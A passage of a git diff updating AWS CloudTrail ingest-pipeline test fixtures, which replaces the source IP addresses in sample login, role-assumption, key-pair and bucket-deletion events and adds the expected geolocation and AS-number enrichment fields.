"{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE:JohnRole1\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1\",\"accountId\":\"111111111111\",\"accessKeyId\":\"AKIAI44QH8DHBEXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2019-10-02T21:50:54Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE\",\"arn\":\"arn:aws:iam::111111111111:role/JohnRole1\",\"accountId\":\"111111111111\",\"userName\":\"JohnDoe\"}}},\"eventTime\":\"2019-10-02T22:12:29Z\",\"eventSource\":\"sts.amazonaws.com\",\"eventName\":\"AssumeRole\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"81.2.69.144\",\"userAgent\":\"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239\",\"requestParameters\":{\"incomingTransitiveTags\":{\"Department\":\"Engineering\"},\"tags\":[{\"value\":\"johndoe@example.com\",\"key\":\"Email\"},{\"value\":\"12345\",\"key\":\"CostCenter\"}],\"roleArn\":\"arn:aws:iam::111111111111:role/JohnRole2\",\"roleSessionName\":\"Role2WithTags\",\"transitiveTagKeys\":[\"Email\",\"CostCenter\"],\"durationSeconds\":3600},\"responseElements\":{\"credentials\":{\"accessKeyId\":\"ASIAWHOJDLGPOEXAMPLE\",\"expiration\":\"Oct 2, 2019 11:12:29 PM\",\"sessionToken\":\"AgoJb3JpZ2luX2VjEB4aCXVzLXdlc3QtMSJHMEXAMPLETOKEN+//rJb8Lo30mFc5MlhFCEbubZvEj0wHB/mDMwIgSEe9gk/Zjr09tZV7F1HDTMhmEXAMPLETOKEN/iEJ/rkqngII9///////////ARABGgw0MjgzMDc4NjM5NjYiDLZjZFKwP4qxQG5sFCryASO4UPz5qE97wPPH1eLMvs7CgSDBSWfonmRTCfokm2FN1+hWUdQQH6adjbbrVLFL8c3jSsBhQ383AvxpwK5YRuDE1AI/+C+WKFZb701eiv9J5La2EXAMPLETOKEN/c7S5Iro1WUJ0q3Cxuo/8HUoSxVhQHM7zF7mWWLhXLEQ52ivL+F6q5dpXu4aTFedpMfnJa8JtkWwG9x1Axj0Ypy2ok8v5unpQGWych1vwdvj6ez1Dm8Xg1+qIzXILiEXAMPLETOKEN/vQGqu8H+nxp3kabcrtOvTFTvxX6vsc8OGwUfHhzAfYGEXAMPLETOKEN/L6v1yMM3B1OwFOrQBno1HEjf1oNI8RnQiMNFdUOtwYj7HUZIOCZmjfN8PPHq77N7GJl9lzvIZKQA0Owcjg+mc78zHCj8y0siY8C96paEXAMPLETOKEN/E3cpksxWdgs91HRzJWScjN2+r2LTGjYhyPqcmFzzo2mCE7mBNEXAMPLETOKEN/oJy+2o83YNW5tOiDmczgDzJZ4UKR84yGYOMfSnF4XcEJrDgAJ3OJFwmTcTQICAlSwLEXAMPLETOKEN\"},\"assumedRoleUser\":{\"assumedRoleId\":\"AROAIFR7WHDTSOYQYHFUE:Role2WithTags\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags\"}},\"requestID\":\"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE\",\"eventID\":\"1917948f-3042-46ec-98e2-62865EXAMPLE\",\"resources\":[{\"ARN\":\"arn:aws:iam::111122223333:role/JohnRole2\",\"accountId\":\"111111111111\",\"type\":\"AWS::IAM::Role\"}],\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"111111111111\"}", "provider": "sts.amazonaws.com", "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log index 14fb436a938..315e72e609e 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log @@ -1,3 +1,3 @@ -{"eventVersion":"1.05","userIdentity":{"type":"IAMUser","principalId":"AIDACKCEVSQ6C2EXAMPLE","arn":"arn:aws:iam::111122223333:user/JohnDoe","accountId":"111122223333","userName":"JohnDoe"},"eventTime":"2014-07-16T15:49:27Z","eventSource":"signin.amazonaws.com","eventName":"ConsoleLogin","awsRegion":"us-east-2","sourceIPAddress":"192.0.2.110","userAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0","requestParameters":null,"responseElements":{"ConsoleLogin":"Success"},"additionalEventData":{"MobileVersion":"No","LoginTo":"https://console.aws.amazon.com/s3/","MFAUsed":"No"},"eventID":"3fcfb182-98f8-4744-bd45-10aEXAMPLE"} -{"eventVersion":"1.05","userIdentity":{"type":"IAMUser","principalId":"AIDACKCEVSQ6C2EXAMPLE","arn":"arn:aws:iam::111122223333:user/JaneDoe","accountId":"111122223333","userName":"JaneDoe"},"eventTime":"2014-07-08T17:35:27Z","eventSource":"signin.amazonaws.com","eventName":"ConsoleLogin","awsRegion":"us-east-2","sourceIPAddress":"192.0.2.100","userAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0","errorMessage":"Failed authentication","requestParameters":null,"responseElements":{"ConsoleLogin":"Failure"},"additionalEventData":{"MobileVersion":"No","LoginTo":"https://console.aws.amazon.com/sns","MFAUsed":"No"},"eventID":"11ea990b-4678-4bcd-8fbe-625EXAMPLE"} -{"eventVersion":"1.05","userIdentity":{"type":"AssumedRole","principalId":"AROAIDPPEZS35WEXAMPLE:AssumedRoleSessionName","arn":"arn:aws:sts::123456789012:assumed-role/RoleToBeAssumed/MySessionName","accountId":"123456789012","accessKeyId":"AKIAIOSFODNN7EXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"20131102T010628Z"},"sessionIssuer":{"type":"Role","principalId":"AROAIDPPEZS35WEXAMPLE","arn":"arn:aws:iam::123456789012:role/RoleToBeAssumed","accountId":"123456789012","userName":"RoleToBeAssumed"}}},"eventTime":"2014-07-08T17:35:27Z","eventSource":"signin.amazonaws.com","eventName":"ConsoleLogin","awsRegion":"us-east-2","sourceIPAddress":"192.0.2.100","userAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0","errorMessage":"Failed authentication","requestParameters":null,"responseElements":{"ConsoleLogin":"Failure"},"additionalEventData":{"MobileVersion":"No","LoginTo":"https://console.aws.amazon.com/sns","MFAUsed":"No"},"eventID":"11ea990b-4678-4bcd-8fbe-625EXAMPLE"} +{"eventVersion":"1.05","userIdentity":{"type":"IAMUser","principalId":"AIDACKCEVSQ6C2EXAMPLE","arn":"arn:aws:iam::111122223333:user/JohnDoe","accountId":"111122223333","userName":"JohnDoe"},"eventTime":"2014-07-16T15:49:27Z","eventSource":"signin.amazonaws.com","eventName":"ConsoleLogin","awsRegion":"us-east-2","sourceIPAddress":"89.160.20.156","userAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0","requestParameters":null,"responseElements":{"ConsoleLogin":"Success"},"additionalEventData":{"MobileVersion":"No","LoginTo":"https://console.aws.amazon.com/s3/","MFAUsed":"No"},"eventID":"3fcfb182-98f8-4744-bd45-10aEXAMPLE"} +{"eventVersion":"1.05","userIdentity":{"type":"IAMUser","principalId":"AIDACKCEVSQ6C2EXAMPLE","arn":"arn:aws:iam::111122223333:user/JaneDoe","accountId":"111122223333","userName":"JaneDoe"},"eventTime":"2014-07-08T17:35:27Z","eventSource":"signin.amazonaws.com","eventName":"ConsoleLogin","awsRegion":"us-east-2","sourceIPAddress":"89.160.20.156","userAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0","errorMessage":"Failed authentication","requestParameters":null,"responseElements":{"ConsoleLogin":"Failure"},"additionalEventData":{"MobileVersion":"No","LoginTo":"https://console.aws.amazon.com/sns","MFAUsed":"No"},"eventID":"11ea990b-4678-4bcd-8fbe-625EXAMPLE"} +{"eventVersion":"1.05","userIdentity":{"type":"AssumedRole","principalId":"AROAIDPPEZS35WEXAMPLE:AssumedRoleSessionName","arn":"arn:aws:sts::123456789012:assumed-role/RoleToBeAssumed/MySessionName","accountId":"123456789012","accessKeyId":"AKIAIOSFODNN7EXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"20131102T010628Z"},"sessionIssuer":{"type":"Role","principalId":"AROAIDPPEZS35WEXAMPLE","arn":"arn:aws:iam::123456789012:role/RoleToBeAssumed","accountId":"123456789012","userName":"RoleToBeAssumed"}}},"eventTime":"2014-07-08T17:35:27Z","eventSource":"signin.amazonaws.com","eventName":"ConsoleLogin","awsRegion":"us-east-2","sourceIPAddress":"89.160.20.156","userAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0","errorMessage":"Failed authentication","requestParameters":null,"responseElements":{"ConsoleLogin":"Failure"},"additionalEventData":{"MobileVersion":"No","LoginTo":"https://console.aws.amazon.com/sns","MFAUsed":"No"},"eventID":"11ea990b-4678-4bcd-8fbe-625EXAMPLE"} diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json index f9ad591fd4f..69fec10edc1 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-console-login-json.log-expected.json @@ -2,8 +2,26 @@ "expected": [ { "source": { - "address": "192.0.2.110", - "ip": "192.0.2.110" + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", + "location": { + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" @@ -24,7 +42,7 @@ ] }, "event": { - "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDACKCEVSQ6C2EXAMPLE\",\"arn\":\"arn:aws:iam::111122223333:user/JohnDoe\",\"accountId\":\"111122223333\",\"userName\":\"JohnDoe\"},\"eventTime\":\"2014-07-16T15:49:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"192.0.2.110\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Success\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/s3/\",\"MFAUsed\":\"No\"},\"eventID\":\"3fcfb182-98f8-4744-bd45-10aEXAMPLE\"}", + "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDACKCEVSQ6C2EXAMPLE\",\"arn\":\"arn:aws:iam::111122223333:user/JohnDoe\",\"accountId\":\"111122223333\",\"userName\":\"JohnDoe\"},\"eventTime\":\"2014-07-16T15:49:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Success\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/s3/\",\"MFAUsed\":\"No\"},\"eventID\":\"3fcfb182-98f8-4744-bd45-10aEXAMPLE\"}", "provider": "signin.amazonaws.com", "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", @@ -86,8 +104,26 @@ }, { "source": { - "address": "192.0.2.100", - "ip": "192.0.2.100" + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", + "location": { + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" @@ -108,7 +144,7 @@ ] }, "event": { - "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDACKCEVSQ6C2EXAMPLE\",\"arn\":\"arn:aws:iam::111122223333:user/JaneDoe\",\"accountId\":\"111122223333\",\"userName\":\"JaneDoe\"},\"eventTime\":\"2014-07-08T17:35:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"192.0.2.100\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"errorMessage\":\"Failed authentication\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Failure\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/sns\",\"MFAUsed\":\"No\"},\"eventID\":\"11ea990b-4678-4bcd-8fbe-625EXAMPLE\"}", + "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDACKCEVSQ6C2EXAMPLE\",\"arn\":\"arn:aws:iam::111122223333:user/JaneDoe\",\"accountId\":\"111122223333\",\"userName\":\"JaneDoe\"},\"eventTime\":\"2014-07-08T17:35:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"errorMessage\":\"Failed authentication\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Failure\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/sns\",\"MFAUsed\":\"No\"},\"eventID\":\"11ea990b-4678-4bcd-8fbe-625EXAMPLE\"}", "provider": "signin.amazonaws.com", "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", @@ -181,11 +217,29 @@ "version": "1.12.0" }, "source": { - "address": "192.0.2.100", - "ip": "192.0.2.100" + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", + "location": { + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AROAIDPPEZS35WEXAMPLE:AssumedRoleSessionName\",\"arn\":\"arn:aws:sts::123456789012:assumed-role/RoleToBeAssumed/MySessionName\",\"accountId\":\"123456789012\",\"accessKeyId\":\"AKIAIOSFODNN7EXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"20131102T010628Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AROAIDPPEZS35WEXAMPLE\",\"arn\":\"arn:aws:iam::123456789012:role/RoleToBeAssumed\",\"accountId\":\"123456789012\",\"userName\":\"RoleToBeAssumed\"}}},\"eventTime\":\"2014-07-08T17:35:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"192.0.2.100\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"errorMessage\":\"Failed authentication\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Failure\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/sns\",\"MFAUsed\":\"No\"},\"eventID\":\"11ea990b-4678-4bcd-8fbe-625EXAMPLE\"}", + "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AROAIDPPEZS35WEXAMPLE:AssumedRoleSessionName\",\"arn\":\"arn:aws:sts::123456789012:assumed-role/RoleToBeAssumed/MySessionName\",\"accountId\":\"123456789012\",\"accessKeyId\":\"AKIAIOSFODNN7EXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"20131102T010628Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AROAIDPPEZS35WEXAMPLE\",\"arn\":\"arn:aws:iam::123456789012:role/RoleToBeAssumed\",\"accountId\":\"123456789012\",\"userName\":\"RoleToBeAssumed\"}}},\"eventTime\":\"2014-07-08T17:35:27Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\"errorMessage\":\"Failed authentication\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Failure\"},\"additionalEventData\":{\"MobileVersion\":\"No\",\"LoginTo\":\"https://console.aws.amazon.com/sns\",\"MFAUsed\":\"No\"},\"eventID\":\"11ea990b-4678-4bcd-8fbe-625EXAMPLE\"}", "provider": "signin.amazonaws.com", "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log index 5b9c40ad40c..81f2d010716 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log @@ -1 +1 @@ -{"eventVersion":"1.0","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2014-03-06T15:15:06Z"}}},"eventTime":"2014-03-06T17:10:34Z","eventSource":"ec2.amazonaws.com","eventName":"CreateKeyPair","awsRegion":"us-east-2","sourceIPAddress":"72.21.198.64","userAgent":"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx","requestParameters":{"keyName":"mykeypair"},"responseElements":{"keyName":"mykeypair","keyFingerprint":"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21","keyMaterial":""}} +{"eventVersion":"1.0","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2014-03-06T15:15:06Z"}}},"eventTime":"2014-03-06T17:10:34Z","eventSource":"ec2.amazonaws.com","eventName":"CreateKeyPair","awsRegion":"us-east-2","sourceIPAddress":"89.160.20.156","userAgent":"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx","requestParameters":{"keyName":"mykeypair"},"responseElements":{"keyName":"mykeypair","keyFingerprint":"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21","keyMaterial":""}} diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json index 034cad20c83..00bd7e5645d 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-create-key-pair-json.log-expected.json @@ -3,25 +3,25 @@ { "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 16509, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "72.21.198.64", - "ip": "72.21.198.64" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" @@ -42,7 +42,7 @@ ] }, "event": { - "original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2014-03-06T15:15:06Z\"}}},\"eventTime\":\"2014-03-06T17:10:34Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"CreateKeyPair\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"72.21.198.64\",\"userAgent\":\"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx\",\"requestParameters\":{\"keyName\":\"mykeypair\"},\"responseElements\":{\"keyName\":\"mykeypair\",\"keyFingerprint\":\"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21\",\"keyMaterial\":\"\u003csensitiveDataRemoved\u003e\"}}", + "original": "{\"eventVersion\":\"1.0\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2014-03-06T15:15:06Z\"}}},\"eventTime\":\"2014-03-06T17:10:34Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"CreateKeyPair\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx\",\"requestParameters\":{\"keyName\":\"mykeypair\"},\"responseElements\":{\"keyName\":\"mykeypair\",\"keyFingerprint\":\"30:1d:46:d0:5b:ad:7e:1b:b6:70:62:8b:ff:38:b5:e9:ab:5d:b8:21\",\"keyMaterial\":\"\u003csensitiveDataRemoved\u003e\"}}", "provider": "ec2.amazonaws.com", "created": "2021-11-11T01:02:03.123456789Z", "kind": "event", diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log index 913b109d7c0..ab5c34153a6 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log @@ -1 +1 @@ -{"eventVersion":"1.04","userIdentity":{"type":"AssumedRole","principalId":"AIDAQRSTUVWXYZEXAMPLE:devdsk","arn":"arn:aws:sts::777788889999:assumed-role/AssumeNothing/devdsk","accountId":"777788889999","accessKeyId":"AKIAQRSTUVWXYZEXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2016-11-14T17:25:26Z"},"sessionIssuer":{"type":"Role","principalId":"AIDAQRSTUVWXYZEXAMPLE","arn":"arn:aws:iam::777788889999:role/AssumeNothing","accountId":"777788889999","userName":"AssumeNothing"}}},"eventTime":"2016-11-14T17:25:45Z","eventSource":"s3.amazonaws.com","eventName":"DeleteBucket","awsRegion":"us-east-2","sourceIPAddress":"192.0.2.1","userAgent":"[aws-cli/1.11.10 Python/2.7.8 Linux/3.2.45-0.6.wd.865.49.315.metal1.x86_64 botocore/1.4.67]","requestParameters":{"bucketName":"my-test-bucket-cross-account"},"responseElements":null,"requestID":"EXAMPLE463D56D4C","eventID":"dEXAMPLE-265a-41e0-9352-4401bEXAMPLE","eventType":"AwsApiCall","recipientAccountId":"777788889999"} +{"eventVersion":"1.04","userIdentity":{"type":"AssumedRole","principalId":"AIDAQRSTUVWXYZEXAMPLE:devdsk","arn":"arn:aws:sts::777788889999:assumed-role/AssumeNothing/devdsk","accountId":"777788889999","accessKeyId":"AKIAQRSTUVWXYZEXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2016-11-14T17:25:26Z"},"sessionIssuer":{"type":"Role","principalId":"AIDAQRSTUVWXYZEXAMPLE","arn":"arn:aws:iam::777788889999:role/AssumeNothing","accountId":"777788889999","userName":"AssumeNothing"}}},"eventTime":"2016-11-14T17:25:45Z","eventSource":"s3.amazonaws.com","eventName":"DeleteBucket","awsRegion":"us-east-2","sourceIPAddress":"89.160.20.156","userAgent":"[aws-cli/1.11.10 Python/2.7.8 Linux/3.2.45-0.6.wd.865.49.315.metal1.x86_64 botocore/1.4.67]","requestParameters":{"bucketName":"my-test-bucket-cross-account"},"responseElements":null,"requestID":"EXAMPLE463D56D4C","eventID":"dEXAMPLE-265a-41e0-9352-4401bEXAMPLE","eventType":"AwsApiCall","recipientAccountId":"777788889999"} diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json index 3a5afdbd8ff..4ed161acea7 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-delete-bucket-json.log-expected.json @@ -12,11 +12,29 @@ "version": "1.12.0" }, "source": { - "address": "192.0.2.1", - "ip": "192.0.2.1" + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", + "location": { + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "original": "{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AIDAQRSTUVWXYZEXAMPLE:devdsk\",\"arn\":\"arn:aws:sts::777788889999:assumed-role/AssumeNothing/devdsk\",\"accountId\":\"777788889999\",\"accessKeyId\":\"AKIAQRSTUVWXYZEXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2016-11-14T17:25:26Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AIDAQRSTUVWXYZEXAMPLE\",\"arn\":\"arn:aws:iam::777788889999:role/AssumeNothing\",\"accountId\":\"777788889999\",\"userName\":\"AssumeNothing\"}}},\"eventTime\":\"2016-11-14T17:25:45Z\",\"eventSource\":\"s3.amazonaws.com\",\"eventName\":\"DeleteBucket\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"192.0.2.1\",\"userAgent\":\"[aws-cli/1.11.10 Python/2.7.8 Linux/3.2.45-0.6.wd.865.49.315.metal1.x86_64 botocore/1.4.67]\",\"requestParameters\":{\"bucketName\":\"my-test-bucket-cross-account\"},\"responseElements\":null,\"requestID\":\"EXAMPLE463D56D4C\",\"eventID\":\"dEXAMPLE-265a-41e0-9352-4401bEXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"777788889999\"}", + "original": 